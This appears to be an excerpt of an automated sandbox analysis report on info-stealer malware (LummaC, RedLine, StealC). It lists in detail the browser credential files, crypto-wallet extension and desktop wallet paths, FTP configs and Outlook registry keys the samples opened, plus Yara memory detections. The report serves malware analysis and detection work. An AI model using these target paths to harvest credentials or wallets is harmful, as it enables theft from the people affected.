Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Directory queried: C:\Users\user\Documents
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Directory queried: C:\Users\user\Documents
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Directory queried: C:\Users\user\Documents\JDSOXXXWOA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Directory queried: C:\Users\user\Documents\NHPKIZUUSG
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Directory queried: C:\Users\user\Documents\NHPKIZUUSG
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Directory queried: C:\Users\user\Documents\NHPKIZUUSG
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Directory queried: C:\Users\user\Documents\JDSOXXXWOA
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Directory queried: C:\Users\user\Documents\JDSOXXXWOA
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Directory queried: C:\Users\user\Documents\NHPKIZUUSG
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Directory queried: C:\Users\user\Documents\NHPKIZUUSG
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Directory queried: C:\Users\user\Documents\JDSOXXXWOA
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Directory queried: C:\Users\user\Documents\JDSOXXXWOA
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Directory queried: C:\Users\user\Documents\JDSOXXXWOA
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Directory queried: C:\Users\user\Documents\JDSOXXXWOA
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Directory queried: C:\Users\user\Documents\NHPKIZUUSG
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Directory queried: C:\Users\user\Documents\NHPKIZUUSG
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Directory queried: C:\Users\user\Documents\NHPKIZUUSG
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT

Source: Yara match	File source: 00000024.00000003.3426127285.0000000001384000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.3212872917.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.3241887546.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.3302300126.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.3274758029.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.3330816935.0000000001383000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.3330670556.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.3270101653.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.3242119222.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.3268957101.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.3053254646.0000000002E90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: stealc_default2.exe PID: 5864, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 3524, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: d0d468f327.exe PID: 5168, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: d0d468f327.exe PID: 5168, type: MEMORYSTR

Yara detected RedLine Stealer

Source: Yara match	File source: 22.2.myrdx.exe.280000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000002.2910389172.00000000002AC000.00000004.00000001.01000000.00000015.sdmp, type: MEMORY
